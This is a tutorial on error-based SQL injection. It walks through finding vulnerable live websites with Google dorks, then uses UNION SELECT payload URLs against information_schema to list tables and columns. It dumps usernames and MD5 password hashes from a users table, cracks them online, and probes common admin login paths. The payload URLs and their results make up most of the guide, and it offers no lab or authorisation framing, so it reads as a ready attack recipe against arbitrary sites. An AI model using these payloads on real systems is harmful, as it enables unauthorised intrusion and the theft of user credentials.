Error Based SQL Injection

  • Error based SQL injection takes advantage of poor error handling in web page processing. This tutorial has been made as simple as possible to be easy to follow through.

     

    For this attack there are usually 5 major steps within the attack to compromise an application but this may vary depending on an application's workflow: 

    • Finding the target
    • Identifying database size i.e. number of columns
    • Extracting database tables
    • Extracting database columns in target tables e.g. user table
    • extracting data from database columns e.g. user account details
    • Cracking passwords of user accounts.

     

    Before we proceed it is important to gather some basic concepts about SQL to enable one to measure success/failure of the attack depending on server and application configuration. 

    1. Union Types: There are 2 types i.e. Union and Union all
    2. Concat operators: These could be among : + , /**/, space, %09,%0a, %0D
    3. Commentors: these could be : --,/*, ##
    4. Group_concat - they are used to request information and display them within a single field e.g. group_concat(table_name),group_concat(column_name),group_concat(schema_name)

     

    1. Finding The Target

     

    To find the target on google you use “google dorks” i.e search terms that sieve out an architecture likely to have this vulnerability. Below are a few examples: 

    • allinurl:index.php?id=
    • allinurl:trainers.php?id=
    • allinurl:buy.php?category=

     

    Now from the results just open the links in a new tab and add an apostrophe after the url (‘). A vulnerable target will respond with something like:

    “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near “LIMIT 1 ‘ at line 1”

     

    Note:
    You could also test the error by adding “'” after the url without the quotes also you could add a “” etc.

     

    2. Identifying the Database

     

    For this stage we will use a few SQL commands. The target for explanatory purposes is :

    http://www.alien.target/browse-items.php?id=23

     

    The first step is to identify the number of columns for the table that holds information on the current page. To do this we will use the order by clause until we get an error and that will mean the lower limit is the (number of columns till we get error - 1).

    • http://www.alien.target/browse-items.php?id=23 order by 1--(no error)
    • http://www.alien.target/browse-items.php?id=23 order by 2--(no error)
    • http://www.alien.target/browse-items.php?id=23 order by 3--(no error)
    • http://www.alien.target/browse-items.php?id=23 order by 4--(no error)
    • http://www.alien.target/browse-items.php?id=23 order by 5--(error)

    Error reads :
    Unknown column '5' in 'order clause'


    Database therefore has four columns.

     

    The next step is finding string columns (columns we can use to extract information via various read and write operations through SQL queries)  . To do this we use the (-) negative quote and union select statement to get them.

     

    For illustration purposes an example would be as the one in the URL constructed below: 

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,3,4--

    notice the – before 23 it is crucial because we are forcing errors it is the easiest way to get one as there is no negative index in the DB.

     

    In this illustration we got the number “3” on the page (the number is usually in bold and always appears out of place) this means that the column 3 can be used to give us the information we desire as a test lets get the mySQL database version. To do this we will replace the number 3 with @@version and have this :

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,@@version,4--


    And voila the mySQL version is displayed.

     


    The next stage is where the data exfiltration starts. Key things to understand in the next queries we would run is to understand the structure of Information Schema. The reason we focus on this database is that it has a definite structure which we can predict and it contains Metadata (Data about data). If unfamiliar with it one can install LAMP or XAMPP on their local server and access it via PHPMyAdmin to learn its components. 

     

    3. Extracting Database Tables

     

    Extracting the database tables involves concat statements and now we want to get table name therefore we will use group_concat(table_name) to extract information from information schema. We will have a url like this:

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

     

    Notice the group_concat(table_name) is in the place of the number 3 as it is the column we can write SQL commands to. What follows after 4 is a constant that means in the tables of information schema we want information regarding tables in the database.

     

    From the attack the webpage  in this illustration the listed tables are as below:
    “tbl_cart,tbl_cartitems,tbl_cartstatus,tbl_categories,tbl_clientdetails,tbl_countries,tbl_deliverymethods,tbl_feedbacks,tbl_inventory,tbl_orders,tbl_orderstatus,tbl_paymentmethods,tbl_payments,tbl_paymentstatus,tbl_permits,tbl_products,tbl_productstatus,tbl_statistics,tbl_sysusers,tbl_tagitems,tbl_tags,tbl_usergroups,tbl_users,tbl_userstatus”

     

    4. Extracting Database Columns


    You can extract columns from all the databases but the easier way to getting the full rights then going for the kill so only deal with table that deals with authentication and in this case it is the table tbl_users.

     

    As a precaution the attacker can hide the table name when requesting the table name. To create hexadecimal equivalents we can use a tool like mth3l3m3nt framework 's payload encoder (Hex with 0x Prefix Option).

     


    The value of tbl_users in that format is : 0x74626c5f7573657273 .The 0x prefix denotes that the value is not a string but a hexadecimal value. To extract information via injection we will extract using group_concat(column_name) and instead of extracting from table schema is a database we will extract information from information schema where the table name is our table which in this case is tbl_users. So the url is going to be:

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x74626c5f7573657273--

    result in this illustration is as below:

    “UserId,Username,Password,GroupId,ActivationCode,StatusId”

     

     

    5. Extracting Data From Database Columns


    The last step is determining the data that is relevant within the table. Since we know the fields we can pick only what we need in our case the username and password. When extracting specific data we use the operator 0x3a (Hexadecimal representation of full colon)and group_concat(0x3a,fieldname) as the method.

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,group_concat(Username,0x3a,Password),4+from+tbl_users--


    When we run the command we get a result similar to below :

    admin:2f103e6dc3675126bebf2386153b635b
    someuser@alien.target:96e79218965eb72c92a549dd5a330112
    someotherguy@alien.target:7b9782f47963eb16a2003636f9be9969

    But I only need admin so now to get the password in plain English.


    6. Cracking Passwords

    The hash shown is a simple php pass md5 hash so let’s crack it using an online service it is faster than using offline method however if you want to you could crack them offline. If so you can use:

    • Hashcat
    • John the ripper

    But I use an online service: https://hashkiller.io/


    Paste the hash verify you are not a bot and click decrypt hashes. Below are the hashes above cracked:

    admin:2f103e6dc3675126bebf2386153b635b:RHINO81
    someuser@alien.target:96e79218965eb72c92a549dd5a330112:111111
    someotherguy@alien.target:7b9782f47963eb16a2003636f9be9969:coastalalien

    Lastly you would need to find the admin area and test the credentials some examples are as below:

    1. /cp
    2. /admin
    3. /cms
    4. /administrator
    5. /admin.php
    6. /owner